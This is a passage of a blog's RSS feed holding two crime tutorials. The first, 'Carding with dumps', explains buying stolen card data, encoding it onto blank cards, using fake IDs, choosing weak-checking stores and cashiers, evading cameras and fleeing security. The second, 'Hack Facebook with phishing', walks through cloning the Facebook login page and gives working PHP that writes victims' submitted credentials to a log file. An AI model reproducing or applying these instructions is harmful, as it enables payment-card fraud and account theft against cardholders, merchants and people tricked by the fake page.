</description><link>https://kryptonhackingworld.blogspot.com/2018/05/self-learning-topics.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyyX8c76RtFiE4e-vaOiIR82f3jALS9CrsQ2hv1mmyIVok0wszLDtfLZaqHzeHJrab4uS5uT6SY6ST0h4QYi_tVzuVFaTFgoHYir9eiirrQU65OfR4L1CsHJmoHvfmyJ12eg8__XjQvkaT/s72-c/download.png" height="72" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-425675784276321914.post-8471374984605095906</guid><pubDate>Mon, 28 May 2018 11:44:00 +0000</pubDate><atom:updated>2018-05-28T04:44:33.079-07:00</atom:updated><title>TUTORIAL Carding with dumps</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2sKJJQCBAWOQDvE-IUnZxRY-74zhbIcNPYfNSbwqpfszqkI6pmNq_OP-_DwgH8h41YeEAj2oI6gf6swQhDkeHAqrRwXgUX4i7xqIPQTf6KJeKAhj-FlXP7xtTIteb3gJcfchPcWzgDI7y/s1600/images+%25281%2529.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;162&quot; data-original-width=&quot;311&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2sKJJQCBAWOQDvE-IUnZxRY-74zhbIcNPYfNSbwqpfszqkI6pmNq_OP-_DwgH8h41YeEAj2oI6gf6swQhDkeHAqrRwXgUX4i7xqIPQTf6KJeKAhj-FlXP7xtTIteb3gJcfchPcWzgDI7y/s1600/images+%25281%2529.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
TUTORIAL Carding with dumps&lt;br /&gt;
&lt;br /&gt;
What do I need for real carding?&lt;br /&gt;
This is a very good question you will need some cash. And the following will be helpful but not required at first. You should get these items at some point, but you don&#39;t need them right away. And I will tell you why in next section.&lt;br /&gt;
&lt;br /&gt;
Computer-laptop is best, as you can carry it with you on your op?s if you desire. If you don&#39;t have a laptop you can use your home P.C. till you can afford to&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt; get one. Of course with home PC you cant take it with you on your ops&lt;br /&gt;
&lt;br /&gt;
Encoder - If you look around most every has or talks about an MSR206 this seems to be the preferred encoder, but you can also use an AMC722. The AMC722 is usually cheaper and does the same thing. Look on the net and you can find these for pretty decent prices. There is a internet company that will ship overnight and you can send payment by Western Union. The have a special for $550.00 you get MSR206 + Exeba Encoding Software + 50 loco or hico cards. Also XRAYSWIPE has pretty good deals on them also and is a reviewed vendor. You can use Exeba Comm software or TheJerm has a software program for the MSR206.&lt;br /&gt;
&lt;br /&gt;
Laptop Bag - You can put your laptop and encoder in this also. Nice to have if you want to take your laptop and encoder on op?s.&lt;br /&gt;
&lt;br /&gt;
Power Inverter - Needed to run your encoder and nice to have if out for long period of time and laptop is dying. You can get these just about anywhere even wallyworld.&lt;br /&gt;
&lt;br /&gt;
Novelty Id - This should be at the top of your list as one of the first thing?s you should get. You will need this at some point you do not want to use your real info. I repeat do not even for 1 time use your real information. There are some good vendors that are quick also. Just look under the reviewed vendor section for more details.&lt;br /&gt;
&lt;br /&gt;
Dumps - Get them from zeusk. You can get classic, gold, platinum, world, business, signature etc. If this is your first time you may want to get classic and start by shopping for low end items. IE anything under $200-$500. Now classics working not good and will go for 1 or 3 times that but the general rule of thumb is under $300 and you should be okay. Gold and Platinum for items above $500 but say to $1,000 and Business, Signature $1,000 and above. These are just suggestions and not hard rules.&lt;br /&gt;
&lt;br /&gt;
Track 1 and 2 or just Track2 - you can get from zeusk. If you just have track2 only you can generate track 1 with PCKit-track1 generator. You will want to encode both tracks to your card. Making sure to change the name on the dump. Some stores only use track2 but it&#39;s best to stay safe and encode both.&lt;br /&gt;
&lt;br /&gt;
Dump Example&lt;br /&gt;
Track1 B410000000000000000000^REGAN/RONALD^0409XXXXXXXXXXXXXXXXXX&lt;br /&gt;
Track2 41000000000000000000=04091XXXXXXXXXXXXXXXXXXX&lt;br /&gt;
&lt;br /&gt;
You of course change the name on track1 to your Novelty last name and first name.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Plastic cards to put dumps on: Okay again never use your own card to encode onto, just not the best idea. You can get cards from just about anywhere, some drugstores sell prepaid cc&#39;s, you can try that or get a Visa or MasterCard branded gift card. Most malls carry this type of GiftCard. Simon Cards have been used a lot in the past so I would suggest staying clear of those. The best way Buy from plastic vendor.&lt;br /&gt;
&lt;br /&gt;
Wallet-You will need extra wallet to store you novelty items. You don?t want to use your own wallet and keep having to take you real cards and id out and replacing them with your novelty.&lt;br /&gt;
&lt;br /&gt;
Anon Phone-Don&#39;t really need but if you have a phone merchant you can call from anon cell before going to use your card.&lt;br /&gt;
&lt;br /&gt;
You don&#39;t need everything I have but they all are helpful.&lt;br /&gt;
&lt;br /&gt;
Quick Start Up: Okay so you don?t have the time to wait to get all your tools or maybe your cash flow is not flowing. You may ponder how can I get up and going as quickly and cheaply as possible.&lt;br /&gt;
&lt;br /&gt;
Answer: You can buy dumps from reviewed vendor of course and buy plastic from plastic vendor. Most plastic vendors will encode your cards for you. This may be the cheapest way to go. Say you buy 5 dumps for $50.00 = $250.00 and 5 plastic for $75.00 =$375.00 total for both $625.00. Add a drop to that $50.00 and for $675.00 you will be ready to go. Another advantage with going this route is you will have matching plastic. The plastic vendor will emboss your plastic with your novelty information. If you don?t have a lot of funds try taking a cash advance on your own card. You will be able to repay it rather quickly.&lt;br /&gt;
&lt;br /&gt;
Okay I finally got everything, I&#39;m Ready to go Right?&lt;br /&gt;
&lt;br /&gt;
Answer: Okay hang on there Skippy, you may think you are ready but are you??&lt;br /&gt;
&lt;br /&gt;
Get into The Correct Frame Of Mind: Remember you are the Cardholder this is your card and you will treat it as such. Repeat 50 times then say back words 25 times, lol, Just kidding but you are who you say you are. This is your card don?t be scared this is your card. Who?s Your Card? Also a good idea to be aware of what your novelty id says. Know the address etc, this will help you feel more at ease and will help if cashier ask off the wall question. Be prepared go over in your mind how different scenes might play out and have good sensible answers.&lt;br /&gt;
&lt;br /&gt;
Remember the customer is always right, Never let them think you?re not legit even if they throw it in your face.&lt;br /&gt;
&lt;br /&gt;
Pick Your Poison! (Where should I shop)&lt;br /&gt;
If you are a Newbie you should try stores with self swipe checkouts. Just beware some of the self swipes will verify your id. Also if you want to get your feet wet grocery stores with self swipe are real nice. They even have the ones that you ring up your own shit and pay without any cashier present.&lt;br /&gt;
&lt;br /&gt;
Gas Stations- I would suggest staying away from gas stations. Most have cameras and why risk someone getting your car info for such a small purchase. Plus some dumps will die quickly when using a Gas Station.&lt;br /&gt;
&lt;br /&gt;
Using Cards with non-matching last 4- Simple shop at stores that do not check last 4 or use AVS or type in CW2 I?m not going to post which stores do and do not at this time. If you don?t know any off hand go there in person and use your legit card and watch what they do.&lt;br /&gt;
&lt;br /&gt;
Cards with matching last 4- Shop anywhere that doesn?t have AVS or type in CW2 I will not list any stores you will have to do your own research.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
What is AVS?&lt;br /&gt;
&lt;br /&gt;
Address Verification System- verifies cardholders real addy, sometimes only uses zipcode.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Security- This is a very important topic, and here are some tips. First never park in front of store in which you are shopping. If someone gets suspicious of you they may write down your license plate or if they have cameras outside they may catch it on there cameras. Always park far enough away that the store cant see which car you got into. If possible park around a corner or have someone else drive and wait out of site for you. If you are using the buddy system You can get some 2 way radios or both keep cell phone on you and if shit hits the fan you can sprint away and have the car meet you somewhere nearby. Never run directly toward your car if shit hits the fan and you have the run, then security is probably running after you. See planning for more information on this. Also you may want to carry a small can of mace or pepper spray key chain size etc. This can be used to get your freedom from security but may lead to more charges if your caught.&lt;br /&gt;
&lt;br /&gt;
Planning- Okay You are now just about ready to go.&lt;br /&gt;
&lt;br /&gt;
1. What area will I be shopping at and what stores- Best to know in advance you can make driving directions to the area and from store to store. This is nice and will sped up the time your in one area. Helps you find the quickest way to and from area also. You don?t have to go this route you can go what I would call this free styling.&lt;br /&gt;
&lt;br /&gt;
2. Once you spot your store find good parking spot away from camera out of view from store. Look around what will you do if shit goes wrong. A good rule of thumb is never run directly toward your car. You can park around the corner in next parking lot over. If shit hits fan you can exit store go in opposite direction and loop around behind the store to your car. Unless your 500 pounds and cant run in which if you try this method you may bet caught if you have to run.&lt;br /&gt;
&lt;br /&gt;
3. Bring other Shirts with you. This is nice, you can change your shit when shopping at different stores this will help you keep much safer. And if your being chased you can take one off and have the other one underneath.&lt;br /&gt;
&lt;br /&gt;
4. Most of the time you wont have any problems and you may tire of parking so far away, you tell yourself I?ve done this 100 times and no problems. But never let your guard or security down. This is what keeps you safe plus it?s good to walk a bit for heath reasons.&lt;br /&gt;
&lt;br /&gt;
5. Keep them guessing, some people wear hats and sunglasses. My advice don?t wear sunglasses inside it only makes you look shady. A easy way to change your appearance is to use real glasses. If you don?t wear glasses use Stage glasses these look like regular lenses but are clear with no prescription. If you already wear glasses try different frames or use contact lenses. Also you can change your facial hair, grow a mustache or a goatee or beard. Then shave it off after sometime and go bareback etc. These are ideas to change your appearence.&lt;br /&gt;
&lt;br /&gt;
6. Dress the part, dress to fit in, you don?t want people to remember you.&lt;br /&gt;
&lt;br /&gt;
7. Always shop a good distance from where you live. You don?t want them to catch you on camera and put a picture of you on the news for your family or friends to see. Also you don?t want to go back to the same stores using your legit information. It?s unlikely they will catch you but you can never be too safe.&lt;br /&gt;
&lt;br /&gt;
Okay I?m ready&lt;br /&gt;
&lt;br /&gt;
Okay you have your cards and dumps, you planned your op out and you have got your mind ready to go what?s next?&lt;br /&gt;
&lt;br /&gt;
Shopping- Yeah let?s go, Remember this is your card. Be confident and act normal. Pick out your product proceed to cashier and check out. Choosing your cashier is vital and you will get rather good with this as you go from what I have heard. Usually younger females are the best. You want them to process you like everyone else. Make them feel they have no reason to ask for more information like id etc. If they ask for id show them , keep in your wallet and just hold it for the can see,&lt;br /&gt;
If they ask to see your card to compare signatures let them do it but keep you hand held out till they give it back. Start small and grow slowly , take time to learn the ropes and it will pay off for you big time.&lt;br /&gt;
&lt;br /&gt;
Also if you card is declined it?s a good idea to carry a backup with you. You can tell them you might have overdrawn your account or limit and tell them you will try another card. If your 2nd card is declined or you don?t have one. Tell them you will go to bank or go get your checkbook etc. If for some reason you get a pick up card tell them you wife or girlfriend lost her card and reported her?s lost and you forgot. 99% of the time they will say okay. You can then try another card or tell them you will be back with checkbook.&lt;br /&gt;
&lt;br /&gt;
Call for authorization- if this happens tell them you in a hurry and don?t have the time to deal with that or tell them your card must be over the limit and you don?t want to purchase the item now. Act as a cardholder would act embarrassed. Whatever you do don?t go through with the call especially if they have your card in there hand.&lt;br /&gt;
&lt;br /&gt;
What to stay away from- If you are new don?t try carding a laptop right away. Start small , I would suggest staying away from high fraud items IE laptops and electronics. Also stay away from high security stores i.e. BB and CC. And stay away from malls they have more security then you need to deal with in the beginning.</description><link>https://kryptonhackingworld.blogspot.com/2018/05/tutorial-carding-with-dumps.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2sKJJQCBAWOQDvE-IUnZxRY-74zhbIcNPYfNSbwqpfszqkI6pmNq_OP-_DwgH8h41YeEAj2oI6gf6swQhDkeHAqrRwXgUX4i7xqIPQTf6KJeKAhj-FlXP7xtTIteb3gJcfchPcWzgDI7y/s72-c/images+%25281%2529.jpg" height="72" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-425675784276321914.post-103953582215745316</guid><pubDate>Mon, 28 May 2018 09:45:00 +0000</pubDate><atom:updated>2018-05-28T02:45:59.153-07:00</atom:updated><title>HACK FACEBOOK WITH PHISHING TECHNIQUES</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg58FZCGwh4D2D0mk1J_1dQjGu_MB_tsv_M9_Rg4EJWiwS0xGDaC69CRvmMvlM7Rto6BoISn1Q5hhwULTR_PCgLk1Z7vopNktdC8-TgrWaxGMB9NSYW8JFSLMmQrd3eTjwDIQmw3kWkr07K/s1600/download+%25281%2529.jpg&quot; imageanchor=&quot;1&quot; style=&quot;background-color: white; margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;184&quot; data-original-width=&quot;274&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg58FZCGwh4D2D0mk1J_1dQjGu_MB_tsv_M9_Rg4EJWiwS0xGDaC69CRvmMvlM7Rto6BoISn1Q5hhwULTR_PCgLk1Z7vopNktdC8-TgrWaxGMB9NSYW8JFSLMmQrd3eTjwDIQmw3kWkr07K/s1600/download+%25281%2529.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;post-body entry-content&quot; id=&quot;post-body-6073421865907088917&quot; itemprop=&quot;description articleBody&quot; style=&quot;font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 1.4; position: relative; width: 586px;&quot;&gt;
&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;span style=&quot;background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;post-body entry-content&quot; id=&quot;post-body-6073421865907088917&quot; itemprop=&quot;description articleBody&quot; style=&quot;font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 1.4; position: relative; width: 586px;&quot;&gt;
&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;span style=&quot;background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;post-body entry-content&quot; id=&quot;post-body-6073421865907088917&quot; itemprop=&quot;description articleBody&quot; style=&quot;font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 1.4; position: relative; width: 586px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: small;&quot;&gt;Phishing is - Tricking your friends (victim) into logging into Facebook or other websites using your custom-&lt;/span&gt;&lt;/span&gt;&lt;br style=&quot;line-height: 18.2px;&quot; /&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: small;&quot;&gt;made webpage which is not the real page. So when they put their details like email/password into your fake&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br style=&quot;line-height: 18.2px;&quot; /&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: small;&quot;&gt;login page, you will receive the information &lt;a name=&#39;more&#39;&gt;&lt;/a&gt;and you can see their password.&lt;/span&gt;&lt;/span&gt;&lt;br style=&quot;line-height: 18.2px;&quot; /&gt;&lt;b style=&quot;line-height: 18.2px;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;/span&gt;&lt;b style=&quot;line-height: 18.2px;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: small;&quot;&gt;What you need to phish:&lt;/span&gt;&lt;/b&gt;&lt;br style=&quot;line-height: 18.2px;&quot; /&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;br /&gt;1) a web host site, try 5gbfree.com or 000webhost.com (webhost is a place where you can keep your custom made website with a given link if you cunt afford a domain)&lt;/span&gt;&lt;br style=&quot;line-height: 18.2px;&quot; /&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;br /&gt;2) a PHP file which will redirect the victim to another url.&lt;/span&gt;&lt;br style=&quot;line-height: 18.2px;&quot; /&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;br /&gt;3) the fake login page (index.htm)&lt;/span&gt;&lt;br style=&quot;line-height: 18.2px;&quot; /&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;br /&gt;4) text storage file (log.txt) where you can see the password in that file.&lt;/span&gt;&lt;br style=&quot;line-height: 18.2px;&quot; /&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;br /&gt;5) a little sense of logic and brains if you don&#39;t know anything about this stuff.&lt;/span&gt;&lt;br style=&quot;line-height: 18.2px;&quot; /&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;br /&gt;6) url shortener website (optional), you don&#39;t want to send an obvious fake url to people right ?&lt;/span&gt;&lt;br style=&quot;line-height: 18.2px;&quot; /&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;br /&gt;HERE WE GO...&lt;/span&gt;&lt;br style=&quot;line-height: 18.2px;&quot; /&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;br /&gt;1) first you gotta get the 3 necessary files (index.htm, post.php, log.txt), the index.htm file is what your victim will see as their fake login page. the post.php file is the PHP file that redirects the victim to another page and sends their login to the log.txt file where you can see the password and email.&lt;/span&gt;&lt;br style=&quot;line-height: 18.2px;&quot; /&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;br /&gt;2) Go to facebook.com homepage where you can see the sign-in. if you&#39;re using chrome and mozilla, you can right-click on the mouse and click on view page source.&amp;nbsp;&lt;/span&gt;&lt;br style=&quot;line-height: 18.2px;&quot; /&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; line-height: 18.2px; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiJ4wAe64Iv2tVCzc8zGcYJcCQ6W-dmpHFSG3PujqlpDiACayp4fwKiXKBXq91HZNVbb2139pOYrUUu9gqmH3AKE4CWDu4QB_hsU054TObg9Nih0Yu7sZuQ6t1f_Edex3A01I-vO5c5Gu7/s1600/ASD.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em; text-decoration-line: none;&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;380&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiJ4wAe64Iv2tVCzc8zGcYJcCQ6W-dmpHFSG3PujqlpDiACayp4fwKiXKBXq91HZNVbb2139pOYrUUu9gqmH3AKE4CWDu4QB_hsU054TObg9Nih0Yu7sZuQ6t1f_Edex3A01I-vO5c5Gu7/s1600/ASD.jpg&quot; style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border-radius: 0px; border: 1px solid transparent; box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; padding: 8px; position: relative;&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;br /&gt;3) Select all (CTRL+A) and COPY them to a notepad file. Save it as index.htm&lt;/span&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; line-height: 18.2px; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmZboiaBD2Tr5QIXemzpwJPk5BFYK1tTe47pfY2bltUhWv5gRoKbBmckeYON5CmEgRTc_bYGYHmP0W_mAxB_kR3w9lmJfXx0mF3gINcM-tGkY3cWFDK2LU6sXpGzItd54KHk2IPowbrGxd/s1600/home.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em; text-decoration-line: none;&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;386&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmZboiaBD2Tr5QIXemzpwJPk5BFYK1tTe47pfY2bltUhWv5gRoKbBmckeYON5CmEgRTc_bYGYHmP0W_mAxB_kR3w9lmJfXx0mF3gINcM-tGkY3cWFDK2LU6sXpGzItd54KHk2IPowbrGxd/s1600/home.jpg&quot; style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border-radius: 0px; border: 1px solid transparent; box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; padding: 8px; position: relative;&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;br /&gt;4) Paste these codes into a notepad file. Before you save as index.htm, you need to edit something. FIND for ACTION. do that by (CTRL+F) and type in ACTION. find 2-3 times till you get something like that in the picture. once you find the action. replace the url next to the action with &#39;post.php&#39;. replace https:/ until login_attempt]. Then save the notepad as index.htm and keep it in a folder.&lt;/span&gt;&lt;br style=&quot;line-height: 18.2px;&quot; /&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; line-height: 18.2px; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuWWP9lqbr1cetCzdAcNrsvWIhrj1cHN96mgBh4Cg0c2CA8ipJFBuSEJnzflrZwNNUR57VCVivmK7vrNRsqcBAoELyFNoUSmp1CyXce-xvea3o2Dv5C2ckhdToPv8Zh38P0BmDnW5tPmDh/s1600/afas.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em; text-decoration-line: none;&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;358&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuWWP9lqbr1cetCzdAcNrsvWIhrj1cHN96mgBh4Cg0c2CA8ipJFBuSEJnzflrZwNNUR57VCVivmK7vrNRsqcBAoELyFNoUSmp1CyXce-xvea3o2Dv5C2ckhdToPv8Zh38P0BmDnW5tPmDh/s1600/afas.jpg&quot; style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border-radius: 0px; border: 1px solid transparent; box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; padding: 8px; position: relative;&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;br /&gt;5) That is your index.htm file. 1 done 3 to go.&lt;/span&gt;&lt;br style=&quot;line-height: 18.2px;&quot; /&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;br /&gt;6) Now we need your php file. post.php&lt;/span&gt;&lt;br style=&quot;line-height: 18.2px;&quot; /&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;br /&gt;7) open another notepad. copy the code below and paste them in the notepad.&lt;/span&gt;&lt;br style=&quot;line-height: 18.2px;&quot; /&gt;&lt;br style=&quot;line-height: 18.2px;&quot; /&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, sans-serif;&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, sans-serif;&quot;&gt;header(”Location: http://www.Facebook.com/login.php “);&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, sans-serif;&quot;&gt;$handle = fopen(”log.txt”, “a”);&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, sans-serif;&quot;&gt;foreach($_GET as $variable =&amp;gt; $value) {&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, sans-serif;&quot;&gt;fwrite($handle, $variable);&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, sans-serif;&quot;&gt;fwrite($handle, “=”);&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, sans-serif;&quot;&gt;fwrite($handle, $value);&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, sans-serif;&quot;&gt;fwrite($handle, “\r\n”);&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, sans-serif;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, sans-serif;&quot;&gt;fwrite($handle, “\r\n”);&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, sans-serif;&quot;&gt;fclose($handle);&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, sans-serif;&quot;&gt;exit;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, sans-serif;&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;br style=&quot;line-height: 18.2px;&quot; /&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;line-height: 18.2px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;div style=&quot;line-height: 18.2px; margin: 0in;&quot;&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Helvetica, sans-serif;&quot;&gt;8) now replace the Location: with some url you want your victim to go to. after they login with your page, they can see this location page.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;line-height: 18.2px; margin: 0in 0in 0.0001pt;&quot;&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;9) then save it as post.php&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;line-height: 18.2px; margin: 0in 0in 0.0001pt;&quot;&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;10) that is your post.php file&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;line-height: 18.2px; margin: 0in 0in 0.0001pt;&quot;&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;11) now just open another notepad. dont write anything. just save it as blank.. save the notepad as log.txt&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;line-height: 18.2px; margin: 0in 0in 0.0001pt;&quot;&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;12) that is your log.txt file where you can see the password.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;line-height: 18.2px; margin: 0in 0in 0.0001pt;&quot;&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;13) MAKE an account on free web host and upload the 3 files. MAKE SURE ONLY THE THREE FILES ARE IN THE FOLDER DIRECTORY. do not keep other files in the folder with the three files. ONLY THE 3 FILES MUST BE THERE.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
